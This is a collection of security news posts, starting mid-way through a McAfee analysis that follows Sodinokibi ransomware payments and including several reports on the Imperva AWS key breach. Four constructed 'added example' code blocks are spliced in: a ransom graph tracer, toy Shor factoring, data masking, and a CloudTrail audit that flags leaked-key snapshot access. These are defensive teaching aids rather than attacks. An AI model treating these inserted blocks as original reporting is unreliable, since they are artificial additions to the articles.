Researching the moniker of ‘Lalartu’ through our data, we went back in time a month or so and discovered a posting from the actor on June 4th of 2019, again referencing GandCrab.

We observe here a couple of transaction IDs (TXID) on the bitcoin ledger, however they are incomplete. More than a week later, on June 17th, 2019, “Lalartu” posted another one with an attachment to it:


In this posting we see a screenshot with partial TXIDs and the amounts. With the help of the ChainAnalysis software and team, we were able to retrieve the full TXIDs. With that list we were able to investigate the transactions and start mapping them out with their software:

From the various samples we have researched, the amounts asked for payment are between 0.44 and 0.45 BTC, an average of 4,000 USD.

In the above screenshot we see the transactions where some of these amounts are transferred from a wallet, or bitcoins are bought at an exchange and transferred to the wallets associated with the affiliate(s).

Based on the list shared by Lalartu in his post, and the average value of bitcoin around the dates, within 72 hours a value of 287,499.00 USD of ransom had been transferred.

Taking the list of transactions as a starting point in our graph-analysis, we colored the lines red and started from there to investigate the wallets involved and interesting transactions:

Although it might look like spaghetti, once you dive in, very interesting patterns can be discovered. We see victims paying to their assigned wallets; from there it takes an average of two to three transactions before it goes to an ‘affiliate’ or ‘distribution’ wallet. From that wallet we see the split happening as the moniker ‘UNKN’ mentioned in his forum post we started this article with. The 60 or 70 percent stays with the affiliate and the remaining 40/30 percent is forwarded in multiple transactions towards the actors behind Sodinokibi.

Once we identified a couple of these transactions, we started to dig in both directions. What is the affiliate doing with the money and where is the money going for the Sodinokibi actors?

We picked one promising affiliate wallet and started to dig deeper down and followed the transactions. As described above, the affiliate is getting money transferred mostly through an exchange (since this is what the actors advise in the ransom note). This is what we see in the example below: incoming ransomware payments are received via Coinbase.com. The affiliate seems to pay some fee to a service but also sends BTC into Bitmix.biz, a popular underground bitcoin mixer that obfuscates the subsequent transactions to make it difficult to link them back to the ‘final’ wallet or cash-out in a (crypto) currency.

We also observed examples where the affiliates were paying for services they bought on Hydra Market, a Russian underground marketplace where many services and illegal products are offered with payment in BTC.

Tracing down the route of splits, we started to search for the 30 or 40 percent cuts of the ransom payments of 0.27359811 BTC or, if the price was doubled, 0.54719622 BTC.

Using the list of amounts and querying the transactions and transfers discovered, we observed a wallet that was receiving a lot of these smaller payments. Due to ongoing research we will not publish the wallet but here is a graph representation of a subset of transactions:

It seems like a spider, but many incoming ‘split’ transfers, and only a few outgoing ones with larger amounts of bitcoins, were observed.

If we take the average of $2,500 – $5,000 USD as a ransom ask, and the mentioned split of 30/40 percent for the actor maintaining the Sodinokibi ransomware and affiliate infrastructure, they make $700 – $1,500 USD per paid infection.
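To make the tracing steps described above concrete, here is an added example (not McAfee ATR’s tooling and not the ChainAnalysis software mentioned in the post) that walks a constructed ledger: per-victim wallets, one to three forwarding hops, an affiliate wallet that splits 60/40 or 70/30, and an operator wallet that collects the minority share and cashes out in one larger transfer. All wallet names, transaction ids and amounts are constructed; the three helpers measure the hop count from a victim wallet to the first split, the split ratio at a wallet, and the “spider” pattern of many small inbound transfers with few larger outbound ones.

```python
"""Toy transaction-graph analysis of a RaaS payout split.
Added example for illustration; not McAfee ATR's or ChainAnalysis code.
Every wallet id, txid and amount below is constructed."""
from collections import defaultdict

# Constructed ledger: (txid, from_wallet, to_wallet, amount_btc)
LEDGER = [
    # victims buy BTC at an exchange and pay into their assigned wallet
    ("tx01", "exchange_A", "assigned_w1", 0.45),
    ("tx02", "exchange_B", "assigned_w2", 0.45),
    ("tx03", "exchange_A", "assigned_w3", 0.44),
    ("tx04", "exchange_B", "assigned_w4", 0.45),
    ("tx05", "exchange_A", "assigned_w5", 0.45),
    # assigned wallets forward to affiliate wallets through zero to two hops
    ("tx06", "assigned_w1", "hop_1a", 0.45),
    ("tx07", "hop_1a", "affiliate_X", 0.45),
    ("tx08", "assigned_w2", "hop_2a", 0.45),
    ("tx09", "hop_2a", "hop_2b", 0.45),
    ("tx10", "hop_2b", "affiliate_X", 0.45),
    ("tx11", "assigned_w3", "affiliate_X", 0.44),
    ("tx12", "assigned_w4", "affiliate_Y", 0.45),
    ("tx13", "assigned_w5", "affiliate_Z", 0.45),
    # affiliates keep 60 or 70 percent and forward the rest to one operator wallet
    ("tx14", "affiliate_X", "affiliate_X_cashout", 0.804),
    ("tx15", "affiliate_X", "operator_W", 0.536),
    ("tx16", "affiliate_Y", "affiliate_Y_cashout", 0.315),
    ("tx17", "affiliate_Y", "operator_W", 0.135),
    ("tx18", "affiliate_Z", "affiliate_Z_cashout", 0.315),
    ("tx19", "affiliate_Z", "operator_W", 0.135),
    # the operator wallet consolidates the small cuts and cashes out in one transfer
    ("tx20", "operator_W", "exchange_C", 0.8),
]


def build_graph(ledger):
    """Return (out_edges, in_edges): wallet -> list of (counterparty, amount)."""
    out_edges, in_edges = defaultdict(list), defaultdict(list)
    for _txid, src, dst, amt in ledger:
        out_edges[src].append((dst, amt))
        in_edges[dst].append((src, amt))
    return out_edges, in_edges


def hops_to_split(graph, start, max_hops=10):
    """Follow single outgoing transfers from a victim wallet until reaching a
    wallet that splits its funds (two or more outputs). None if no split found."""
    out_edges, _ = graph
    wallet, hops, seen = start, 0, {start}
    while hops < max_hops:
        nxt = out_edges.get(wallet, [])
        if len(nxt) >= 2:
            return hops
        if not nxt:
            return None
        wallet = nxt[0][0]
        if wallet in seen:  # defensive: stop on cycles
            return None
        seen.add(wallet)
        hops += 1
    return None


def split_ratios(graph, wallet):
    """Share of the wallet's outgoing BTC sent to each counterparty, largest first."""
    out_edges, _ = graph
    outs = out_edges.get(wallet, [])
    total = sum(a for _, a in outs)
    if total == 0:
        return []
    return sorted(((to, round(a / total, 2)) for to, a in outs), key=lambda x: -x[1])


def collector_wallets(graph, min_in=3, max_out=1):
    """The 'spider' pattern: many inbound transfers, few outbound ones, and the
    outbound transfers at least as large as any single inbound one."""
    out_edges, in_edges = graph
    hits = []
    for wallet, ins in in_edges.items():
        outs = out_edges.get(wallet, [])
        if len(ins) >= min_in and 0 < len(outs) <= max_out:
            if max(a for _, a in outs) >= max(a for _, a in ins):
                hits.append(wallet)
    return sorted(hits)


if __name__ == "__main__":
    g = build_graph(LEDGER)
    for v in ("assigned_w1", "assigned_w2", "assigned_w3"):
        print(v, "hops to split:", hops_to_split(g, v))
    print("affiliate_X split:", split_ratios(g, "affiliate_X"))
    print("collector wallets:", collector_wallets(g))
```

On real ledgers the same three measurements are what distinguish a mixer (many in, many out) from an operator collection wallet (many in, few out), and the ratio check is how a 60/40 or 70/30 affiliate programme becomes visible without any forum post.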

We already saw in the beginning of this article that the affiliate Lalartu claimed to have made 287k USD in 72 hours, which is an 86k USD profit for the actor from one affiliate only.

In episode 2, The All-Stars, we explained how the structure is setup and how each affiliate has its own id.

As far as we tracked the samples and extracted the id-numbers, we counted over 41 active affiliates. The data showed that, in a relatively short amount of time, the velocity and number of infections was high. Taking this velocity combined with a few payments per day, we can imagine that the actors behind Sodinokibi are making a fortune.

Following the traces of one particular affiliate, we ended up seeing large amounts of bitcoins being transferred into a wallet which had a total value of 443 BTC, around 4.5 million USD at the average bitcoin price.

We do understand that there are situations in which executives decide to pay the ransom but, by doing that, we keep this business model alive and also fund other criminal markets.

Conclusion

In this blog we focused on insights into the financial streams behind ransomware. By linking underground forum posts with bitcoin transfer traces, we were able to uncover new information on the size of the campaign and associated revenue. In some cases, we were able even to get detailed insights into what the affiliates do with their earnings following a “successful” attack. It shows that paying ransomware is not only keeping the ‘ransom-model’ alive but is also supporting other forms of crime.

In the next and final episode, “Crescendo” McAfee ATR reveals insights gleaned from a global network of honey pots.

The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Follow The Money appeared first on McAfee Blogs.

IDG Contributor Network: 5 practical ways your organization can benefit from DevSecOps

It’s right there in the moniker: DevSecOps, a portmanteau of Development, Security and Operations, implies introducing security early on – as a part of a comprehensive, agile Software Development Life Cycle (SDLC) used by your organization, rather than doing so iteratively or waiting until after a release.

Given how security breaches and vulnerabilities have become everyday news, it makes little sense for developers to ignore the seriousness of secure coding anymore. Here’s a little secret though: developers are often not the most security-oriented folks, for obvious reasons. It is not their primary duty. The priority for a software developer is to build an app, have it carry out the intended tasks nicely and perhaps account for the overall user experience (UX) and satisfaction. If they are being diligent, they may incorporate basic ‘security checks’ as a part of their coding processes – such as not blindly trusting user input and sanitizing it – but beyond that, a developer alone may not have adequate bandwidth or expertise to incorporate the most thorough security checks in an app.

To read this article in full, please click here

SAP Teched Postmortem: SAP HANA Cloud’s potential impact on S/4HANA

Among the announcements coming out of SAP Teched in Barcelona last week was the impending release of SAP HANA Cloud, where the database has been rearchitected specifically for the cloud. While SAP has not mentioned anything specific about it, we think that HANA’s cloud design could have a huge impact on how SAP delivers its enterprise SaaS services, starting with S/4HANA.

Factoring 2048-bit Numbers Using 20 Million Qubits

This theoretical paper shows how to factor 2048-bit RSA moduli with a 20-million qubit quantum computer in eight hours. It's interesting work, but I don't want to overstate the risk.

We know from Shor's Algorithm that both factoring and discrete logs are easy to solve on a large, working quantum computer. Both of those are currently beyond our technological abilities. We barely have quantum computers with 50 to 100 qubits. Extending this requires advances not only in the number of qubits we can work with, but in making the system stable enough to read any answers. You'll hear this called "error rate" or "coherence" -- this paper talks about "noise."
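For readers who want to see why a working quantum computer breaks RSA, here is an added example (not from the paper or this post) of the classical half of Shor's algorithm. The quantum part of Shor is period finding: given a base a, find the smallest r with a^r ≡ 1 (mod N). Everything else is ordinary number theory, and the example below replaces the quantum step with brute force on a small modulus, then finishes with the textbook RSA key recovery. The modulus 3233 = 53 × 61 and exponent 17 are the usual textbook values, and all function names are the example's own.

```python
"""Classical post-processing of Shor's algorithm, with the quantum period-finding
step simulated by brute force on small moduli. Added example, not the paper's code.
Works only for toy sizes; the whole point of a quantum computer is that the
order-finding step below becomes feasible for 2048-bit N."""
from math import gcd
import random


def find_order(a, n):
    """Stand-in for the quantum step: smallest r > 0 with a**r % n == 1.
    Brute force is exponential in the bit length of n."""
    r, x = 1, a % n
    while x != 1:
        x = (x * a) % n
        r += 1
        if r > n:       # cannot happen for gcd(a, n) == 1, kept as a guard
            return None
    return r


def shor_factor(n, a):
    """Try to split n using base a. Returns a non-trivial factor or None,
    in which case Shor's algorithm simply retries with another base."""
    g = gcd(a, n)
    if g != 1:
        return g                      # lucky base: already shares a factor
    r = find_order(a, n)
    if r is None or r % 2:
        return None                   # odd order: a**(r/2) is not defined
    y = pow(a, r // 2, n)             # a non-trivial square root of 1 mod n...
    if y == n - 1:
        return None                   # ...unless it is the trivial root -1
    f = gcd(y - 1, n)                 # (y-1)(y+1) == 0 mod n, so one side shares a factor
    return f if 1 < f < n else gcd(y + 1, n)


def factor(n, tries=100, seed=0):
    """Random-base loop; each base succeeds with probability at least 1/2."""
    rng = random.Random(seed)
    for _ in range(tries):
        f = shor_factor(n, rng.randrange(2, n))
        if f and 1 < f < n:
            return sorted((f, n // f))
    return None


def rsa_private_exponent(n, e):
    """Once N is factored the private key follows immediately: d = e^-1 mod phi(N)."""
    p, q = factor(n)
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)


if __name__ == "__main__":
    print("order of 7 mod 15:", find_order(7, 15))      # 4
    print("factors of 3233:", factor(3233))              # [53, 61]
    print("d for (n=3233, e=17):", rsa_private_exponent(3233, 17))  # 2753
```

The reduction is the reason the security margin of RSA is measured entirely by the cost of order finding: the classical glue around it costs a handful of gcds and modular exponentiations, which is why the paper's eight-hour figure is dominated by the quantum circuit and its error correction, not by anything in the code above.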

Advances are hard. At this point, we don't know if they're "send a man to the moon" hard or "faster-than-light travel" hard. If I were guessing, I would say they're the former, but still harder than we can accomplish with our current understanding of physics and technology.

I write about all this generally, and in detail, here. (Short summary: Our work on quantum-resistant algorithms is outpacing our work on quantum computers, so we'll be fine in the short run. But future theoretical work on quantum computing could easily change what "quantum resistant" means, so it's possible that public-key cryptography will simply not be possible in the long run. That's not terrible, though; we have a lot of good scalable secret-key systems that do much the same things.)

Analysis reveals the most common causes behind mis-issued SSL/TLS certificates

We should be able to trust public key certificates, but this is the real world: mistakes and “mistakes” happen. Researchers from Indiana University Bloomington have analyzed 379 reported instances of failures in certificate issuance to pinpoint the most common causes as well as systemic issues that contribute to these happening. About public key certificates A public key certificate (aka digital certificate) proves that an individual, entity or a device is the rightful owner and user … More

The post Analysis reveals the most common causes behind mis-issued SSL/TLS certificates appeared first on Help Net Security.

Stolen Cloud API Key to Blame for Imperva Breach


A security breach which led to the compromise of customer data at Imperva was caused by a stolen API key for one of its Amazon Web Services (AWS) accounts, the firm has revealed.

The firm was notified of the incident, which affected a subset of its Cloud WAF customers, by a third party at the end of August.

Chief technology officer, Kunal Anand, explained in a blog post that the firm decided back in 2017 to migrate to the AWS Relational Database Service (RDS) in order to provide greater scale for its user database.

As part of this process the firm created a database snapshot for testing on September 15, 2017.

Separately, Imperva’s IT team created an internal compute instance containing an AWS administrative API key. Unfortunately, this server was left exposed and subsequently found by a hacker, who stole the all-important key and used it to access the database snapshot, exfiltrating the information in October 2018.

The stolen data included email addresses, hashed and salted passwords, API keys, and TLS keys — although Anand claimed to have found no evidence so far that it is being abused for malicious ends.

Imperva has since tightened its internal security, by ensuring new instances are created behind a VPN, unused and non-critical instances are decommissioned, and by putting monitoring and patching programs in place.

Other corrective actions taken include an increase in the frequency of infrastructure scanning, tighter access controls, and an increase in auditing of snapshot access.

At Imperva’s request, more than 13,000 customer passwords were changed and over 13,500 SSL certificates rotated following the breach, highlighting the scale of the incident. In addition, over 1400 API keys were regenerated, according to Anand.

Scottish Teens Charged With Met Police Hack

Scottish Teens Charged With Met Police Hack

Two Scottish teenagers have been arrested on suspicion of hacking and defacing a news platform used by London’s Metropolitan Police earlier this year.

An 18-year-old from Lossiemouth near Inverness and a 19-year-old from Glasgow were charged by Scottish police, according to the BBC.

The July attack compromised the Met’s Mynewsdesk platform and allowed the hackers to post a string of offensive and often bizarre messages to the police force’s Twitter feed, as well as emails sent to subscribers and a micro-site.

The Twitter account, which has over one million subscribers, was hijacked to post messages including: “F*** THE POLICE FREE DA GANG!!,” “what you gonna do phone the police?,” and “XEON IS THE BEST FIGHTER IN SCOTLAND.”

At the time, right-wing commentator Katie Hopkins jumped on the news to claim the police force had not only “lost control of London streets” but also "lost control of their Twitter account too.”

Shortly after, Donald Trump retweeted her comments to continue his spat with London mayor Sadiq Khan, claiming: “With the incompetent Mayor of London, you will never have safe streets.”

“Two men, aged 18 and 19, from the Lossiemouth and Glasgow areas respectively, have been arrested and charged in connection with unauthorized access and publication of content on the Metropolitan Police Service's news platform on Friday 19 July 2019,” a Police Scotland spokesperson told the British broadcaster.

“A report will be submitted to the Crown Office and Procurator Fiscal Service.”

It’s unclear how the account was remotely compromised, although the obvious culprit would be easy-to-guess or crack passwords.

At the time of the initial incident, security experts urged organizations to improve login security and for IT to communicate the implications of neglecting such processes to regular users who may be in charge of public-facing accounts.

Prioritizing Data Security Investments through a Data Security Governance Framework (DSGF)

Estimated reading time: 2 minutes

A shift to prioritize data security investments through a Data Security Governance Framework (DSGF) was among the top seven security and risk management trends identified by global research & advisory firm Gartner in 2019.

Breaking it down, the report observed that the changing paradigm of security meant that enterprises were required to identify other frameworks for protecting data. The first step involves the understanding of the data generated by asking questions such as:

  • Why was this data created?
  • When was it created?
  • How will it be used?
  • Is this data compliant with the regulations my business needs to adhere to?
  • Can the original owner of the data make a request to get it deleted?

A framework for better data security

By answering these questions, enterprises can create a Data Security Governance Framework (DSGF) to better utilize and protect data. The research recommends this approach over acquiring data protection products and trying to adapt them to suit a business need. A Data Security Governance Framework (DSGF) provides an organization-centric blueprint which classifies data assets and provides the bedrock for data security policies.

In this framework, there is no one-size-fits-all solution. Every enterprise approaches data security on a case-by-case basis, trying to understand their unique data security requirements in the hopes of finding unique solutions.

The need for better alignment

The framework helps to provide a balance between the business need to maximize competitive advantage and the need to apply appropriate security policy rules. Adopting this framework will require greater collaboration within an enterprise’s Information Security Team regarding aligning approaches for data classification and lifecycle management. This involves classifying data according to unique requirements – which dataset is the most important and requires maximum security?

Different businesses use different methods for protecting data –

Data Masking

A method through which data at rest or in motion is masked which protects it but also ensures that it is usable. It helps organizations raise their level of security for sensitive data while conforming to privacy regulations and other compliances.
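As an added illustration of what “masked but still usable” means in practice (this is example code, not Seqrite’s product or the Gartner report’s material), the block below applies two common masking techniques to a constructed customer record: partial masking that preserves format so the value still looks valid to downstream systems, and keyed tokenization (HMAC) that replaces an identifier with a stable pseudonym so records can still be joined across datasets without exposing the original value. The field names, the policy mapping and the key are constructed for the example.

```python
"""Format-preserving partial masking and keyed tokenization of a data record.
Added example for illustration; not vendor code. Field names, the sample
record and the key are constructed."""
import hashlib
import hmac


def mask_email(addr):
    """Keep the first character of the local part and the domain: a****@example.test"""
    local, _, domain = addr.partition("@")
    if not domain:
        raise ValueError("not an e-mail address")
    return local[0] + "*" * max(len(local) - 1, 1) + "@" + domain


def mask_pan(pan, keep_last=4):
    """Mask all but the last digits of a card number, preserving length and separators."""
    digits = [c for c in pan if c.isdigit()]
    shown = set(range(len(digits) - keep_last, len(digits)))
    out, i = [], 0
    for c in pan:
        if c.isdigit():
            out.append(c if i in shown else "*")
            i += 1
        else:
            out.append(c)
    return "".join(out)


def tokenize(value, key):
    """Deterministic pseudonym: same input and key give the same token, so two
    masked datasets can still be joined on it, but the value is not recoverable
    without the key (unlike a plain hash, it cannot be brute-forced from a dictionary)."""
    return hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()[:16]


# Constructed masking policy: which transformation applies to which field
POLICY = {
    "email": mask_email,
    "card_number": mask_pan,
    "customer_id": "tokenize",   # handled specially because it needs the key
}


def mask_record(record, key, policy=POLICY):
    """Return a masked copy of the record; fields not in the policy pass through."""
    masked = {}
    for field, value in record.items():
        rule = policy.get(field)
        if rule is None:
            masked[field] = value
        elif rule == "tokenize":
            masked[field] = tokenize(str(value), key)
        else:
            masked[field] = rule(value)
    return masked


if __name__ == "__main__":
    key = b"constructed-demo-key-do-not-reuse"
    sample = {"customer_id": "C-10042", "email": "alice@example.test",
              "card_number": "4111 1111 1111 1111", "country": "IN"}
    print(mask_record(sample, key))
```

The key used for tokenization is itself a data asset that the framework has to classify and protect: whoever holds it can re-link tokens to customers, so it belongs in the highest-sensitivity tier rather than next to the masked dataset.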

Data Audit and Protection

This method uses active data control, monitoring and logging to check and detect suspicious activities.

Unusual behaviour and anomalies are detected, flagged and acted upon instantly by stopping suspicious users from accessing critical data and alerting network administrators to this behaviour. Data is separated from users according to their roles.

DSGF can be a useful tool for enterprises to plan their data security investments and allocations. The framework helps an enterprise understand its own requirements clearly and make better investment decisions. Some of the key areas in which a DSGF can help are:

  • Volume, veracity and variety details of each type of dataset
  • Business risks and financial impacts of each dataset
  • Data residency issues affecting each dataset, specifically as there are different data privacy laws for different geographies and jurisdictions
  • Asset management data
  • Consistent access and usage policies for different datasets

Rather than using technology to solve their data security issues, enterprises must ideally use the Data Security Governance Framework (DSGF) to understand and identify their own business requirements. Once the identification is conducted and a framework is created, it would then be prudent to identify the appropriate technology solution for an enterprise’s own data needs.

However, if you want expert consultation on your current framework, please contact us and we will be glad to advise you.

The post Prioritizing Data Security Investments through a Data Security Governance Framework (DSGF) appeared first on Seqrite Blog.

Apple Under Fire Over Sending Some Users Browsing Data to China’s Tencent

Do you know Apple is sending iOS web browsing related data of some of its users to Chinese Internet company Tencent? I am sure many of you are not aware of this, neither was I, and believe me, none of us could expect this from a tech company that promotes itself as a champion of consumer privacy. Late last week, it was widely revealed that starting from at least iOS 12.2, Apple silently

Imperva explains how hackers stole AWS API Key and accessed to customer data

Imperva shared details on the incident it recently suffered and how hackers obtained data on Cloud Web Application Firewall (WAF) customers.

In August, cybersecurity firm Imperva disclosed a data breach that exposed sensitive information for some customers of its Cloud Web Application Firewall (WAF) product, formerly known as Incapsula.

Incapsula is a CDN service designed to protect customers’ websites from all threats and mitigate DDoS attacks.

Imperva CEO Chris Hylen revealed that the company learned about the incident on August 20, 2019, when it was informed about the data exposure impacting Cloud Web Application Firewall (WAF) product.

“We want to be very clear that this data exposure is limited to our Cloud WAF product,” reads Hylen’s announcement. “Here is what we know about the situation today:

  • On August 20, 2019, we learned from a third party of a data exposure that impacts a subset of customers of our Cloud WAF product who had accounts through September 15, 2017.
  • Elements of our Incapsula customer database through September 15, 2017 were exposed. These included:
    • email addresses
    • hashed and salted passwords

Leaked data included email addresses and hashed and salted passwords for all Cloud WAF customers who registered before September 15, 2017.

Hylen added that, for a subset of the Incapsula customers through September 15, 2017, API keys and customer-provided SSL certificates were also exposed.

In a blog post published by Imperva, the company confirmed that it was informed of the incident by someone who had requested a bug bounty. The firm explained that the data was exfiltrated without exploiting any vulnerability in its systems.

The analysis of the data confirmed that attackers stole data in October.

“Our investigation identified an unauthorized use of an administrative API key in one of our production AWS accounts in October 2018, which led to an exposure of a database snapshot containing emails and hashed & salted passwords.” reads the post published by Imperva.

“We compared the SQL dump in the provided dataset to our snapshots and found a match. As of this post, we can say that the elements of customer data defined above were limited to Cloud WAF accounts prior and up to September 15, 2017. Databases and snapshots for our other product offerings were not exfiltrated,”

The company announced that it has adopted additional security measures to protect its customers, including creating new instances behind its VPN by default, implementing monitoring and patching programs, and decommissioning unused and non-critical compute instances.

Imperva explained that the incident was related to the migration of its infrastructure to AWS cloud technologies, a process that began back in 2017.

At the time, the development team created a database snapshot for testing and to evaluate the migration to AWS. An internal compute instance that they created was exposed online and it contained an AWS API key. This instance was compromised and hackers exfiltrated the AWS API key and used it to access the snapshot.

In response to the incident, Imperva changed 13,000 passwords, rotated more than 13,500 SSL certificates and regenerated roughly 1,400 API keys. The good news is that the company is not aware of malicious account activity associated with the hack.
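Both write-ups of this incident on this page (the Infosecurity one above and this Security Affairs one) describe the same root cause, a long-lived administrative API key on an exposed instance used to read an RDS database snapshot, and the same remediation, including “an increase in auditing of snapshot access”. The block below is an added example of what such an audit looks like when run over CloudTrail records; it is not Imperva’s tooling, and the log lines, access key ids, IP addresses, snapshot name and trusted VPN range are all constructed. It flags RDS snapshot API calls that come from outside the trusted network, that use a long-lived IAM user key (AKIA… prefix) rather than temporary STS credentials (ASIA… prefix), or that share a snapshot with every AWS account.

```python
"""Audit RDS snapshot API activity from CloudTrail-style records.
Added example, not Imperva's tooling. Records, key ids, IPs, the snapshot name
and the trusted network range are constructed for illustration."""
import ipaddress
import json

# RDS API calls that create, copy, enumerate, share or restore database snapshots
SNAPSHOT_EVENTS = {
    "CreateDBSnapshot", "CopyDBSnapshot", "DescribeDBSnapshots",
    "ModifyDBSnapshotAttribute", "RestoreDBInstanceFromDBSnapshot",
}
# Constructed: egress range of the VPN that administrative calls should come from
TRUSTED_NETWORKS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed CloudTrail-style records, one JSON object per line (not real log data)
SAMPLE_LOG = r'''
{"eventTime":"2018-10-01T09:12:44Z","eventSource":"rds.amazonaws.com","eventName":"DescribeDBSnapshots","sourceIPAddress":"10.20.3.4","userIdentity":{"type":"AssumedRole","accessKeyId":"ASIAEXAMPLE0000000001"},"requestParameters":{}}
{"eventTime":"2018-10-01T21:03:10Z","eventSource":"rds.amazonaws.com","eventName":"ModifyDBSnapshotAttribute","sourceIPAddress":"203.0.113.7","userIdentity":{"type":"IAMUser","userName":"migration-admin","accessKeyId":"AKIAEXAMPLE0000000002"},"requestParameters":{"dBSnapshotIdentifier":"users-db-test-snapshot","attributeName":"restore","valuesToAdd":["all"]}}
{"eventTime":"2018-10-01T21:05:31Z","eventSource":"rds.amazonaws.com","eventName":"RestoreDBInstanceFromDBSnapshot","sourceIPAddress":"10.0.5.5","userIdentity":{"type":"AssumedRole","accessKeyId":"ASIAEXAMPLE0000000003"},"requestParameters":{"dBSnapshotIdentifier":"users-db-test-snapshot"}}
{"eventTime":"2018-10-01T21:06:02Z","eventSource":"ec2.amazonaws.com","eventName":"DescribeInstances","sourceIPAddress":"203.0.113.7","userIdentity":{"type":"IAMUser","accessKeyId":"AKIAEXAMPLE0000000002"},"requestParameters":{}}
'''


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_trusted(ip):
    """True only for parseable addresses inside the trusted ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:          # e.g. service-originated calls carry a hostname
        return False
    return any(addr in net for net in TRUSTED_NETWORKS)


def findings_for(event):
    """Reasons a snapshot-related event deserves review; empty list if none."""
    if event.get("eventSource") != "rds.amazonaws.com":
        return []
    if event.get("eventName") not in SNAPSHOT_EVENTS:
        return []
    reasons = []
    if not is_trusted(event.get("sourceIPAddress", "")):
        reasons.append("untrusted_source_ip")
    key = event.get("userIdentity", {}).get("accessKeyId", "")
    if key.startswith("AKIA"):  # long-lived IAM user key, not temporary STS credentials
        reasons.append("long_lived_access_key")
    params = event.get("requestParameters") or {}
    if event["eventName"] == "ModifyDBSnapshotAttribute" and "all" in (params.get("valuesToAdd") or []):
        reasons.append("snapshot_shared_publicly")
    return reasons


def audit(text):
    """Return one finding per suspicious snapshot event."""
    findings = []
    for ev in parse_events(text):
        reasons = findings_for(ev)
        if reasons:
            findings.append({
                "time": ev.get("eventTime"),
                "event": ev["eventName"],
                "key": ev.get("userIdentity", {}).get("accessKeyId"),
                "ip": ev.get("sourceIPAddress"),
                "snapshot": (ev.get("requestParameters") or {}).get("dBSnapshotIdentifier"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print(json.dumps(f))
```

The first and third sample records show the expected shape of legitimate administration after the remediation described in the article: temporary credentials obtained through a role, coming from the VPN range. The second record is the pattern worth paging on, and the third reason attached to it (making a snapshot restorable by any account) is the one that turns a credential compromise into a bulk data exposure.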

While the company is still investigating the incident it recommends the following security measures to its customers:

Pierluigi Paganini

(SecurityAffairs – Imperva, hacking)

The post Imperva explains how hackers stole AWS API Key and accessed to customer data appeared first on Security Affairs.

Thoma Bravo to acquire Sophos for $3.9 billion

Sophos announced that Thoma Bravo, a US-based private equity firm, has made an offer to acquire Sophos for $7.40 USD per share, representing an enterprise value of approximately $3.9 billion. The board of directors of Sophos have stated their intention to unanimously recommend the offer to the company’s shareholders. Thoma Bravo is a leading private equity firm focused on the software and technology enabled services sector with more than $35 billion in investor commitments. With … More

The post Thoma Bravo to acquire Sophos for $3.9 billion appeared first on Help Net Security.

Microsoft and NIST Team Up on Patching Guide


Microsoft has teamed up with the US National Institute of Standards and Technology (NIST) to develop a new guide designed to make enterprise patch management easier.

Microsoft lead cybersecurity architect, Mark Simon, explained that the firm had first worked closely with partners from the Center for Internet Security, Department of Homeland Security (DHS) and the DHS’s Cybersecurity and Infrastructure Security Agency (CISA), as well as visiting several customers.

Two common challenges emerging from discussions with the latter revolved around testing of patches and confusion over how quickly they should be implemented.

“This articulated need for good reference processes was further validated by observing that a common practice for ‘testing’ a patch before a deployment often consisted solely of asking whether anyone else had any issues with the patch in an online forum,” Simon explained.

“This realization guided the discussions with our partners towards creating an initiative in the NIST NCCoE [National Cybersecurity Center of Excellence] in collaboration with other industry vendors. This project — kicking off soon — will build common enterprise patch management reference architectures and processes, have relevant vendors build and validate implementation instructions in the NCCoE lab, and share the results in the NIST Special Publication 1800 practice guide for all to benefit.”

Microsoft has extended an open invitation to join the effort to any vendors which have technology that could streamline the patching process, and organizations or individuals who may have wisdom to share — either best practice tips or lessons learned.

Fixing software vulnerabilities has never been more important, especially as society increasingly relies on modern IT systems. The growth of digital transformation projects will only further amplify their importance, argued Simon.

“Applying patches is a critical part of protecting your system, and we learned that while it isn’t as easy as security departments think, it isn’t as hard as IT organizations think,” he concluded.

3 reasons cyber security training is essential

Organisations are always looking for ways to improve their cyber security defences, but they often overlook the value of enrolling their employees on cyber security training courses.

According to a study by Centrify, 77% of UK workers say they have never received any form of cyber skills training. Given that, it’s no surprise that so many people exercise such poor security practices.

For example, the survey also revealed that 27% of employees use the same passwords for multiple accounts and 14% leave their credentials written down in a notebook or on their desk.

It’s easy to scoff at people for making basic mistakes, but if employers don’t teach them otherwise, they’re inviting trouble.

With October being European Cyber Security Awareness Month, what better time is there to boost your organisation’s knowledge of effective information security practices?

Here are three reasons to consider it:

1. You’ll reduce the risk of data breaches

If you want to keep your organisation secure, you need your employees to know what they’re doing. Almost all data breaches are caused by a mistake somewhere in the organisation.

That doesn’t only mean negligence – it could also be mistakes that you don’t even know are mistakes, such as gaps in your policies, ineffective processes or a lack of proper technological defences.

Placing staff on information security training courses will help them understand the mistakes they’re making and teach them to work more effectively.

This is especially useful if you intend to commit to a framework such as ISO 27001, the international standard for information security, as there are specific courses that teach you how to follow the Standard’s requirements.

2. You’ll meet compliance requirements

Cyber security laws and regulations inevitably contain complex requirements, so organisations need employees with specialist knowledge to achieve compliance.

For example, organisations that are required to appoint a DPO (data protection officer) under the EU GDPR (General Data Protection Regulation) must find someone with an in-depth understanding of data protection law.

The stakes associated with the position are huge; if the DPO doesn’t perform their tasks in accordance with the GDPR’s requirements, the organisation is liable to face regulatory action.

It’s therefore paramount that the DPO is given every resource available to do their job properly, and training courses should always be sought where possible.

They are not only the quickest way of studying but also usually include exams, which reassures employers that the individual is qualified.

The same advice applies for individuals in roles that involve compliance with the NIS Regulations (Network and Information Systems Regulations 2018), the PCI DSS (Payment Card Industry Data Security Standard), ISO 27001 or any other law or framework.

3. You’ll foster career growth

Training courses enable employees to pick up new skills and gain more advanced qualifications, which will help them move into more senior roles. This isn’t only beneficial for them but also their employers. It’s getting increasingly hard to find qualified information security professionals, with one report estimating that there will be 3.5 million unfilled jobs in the industry by 2021.

Finding qualified personnel isn’t the only problem. A small pool of skilled workers also means job candidates can command a higher salary and more benefits. As such, organisations might not be able to afford qualified professionals even if they can find them.

They should therefore do whatever they can to support employees who want to go on training courses. Organisations will almost certainly benefit from the extra knowledge, and it eases the pressure of finding skilled personnel in the job market.

Which course is right for you?

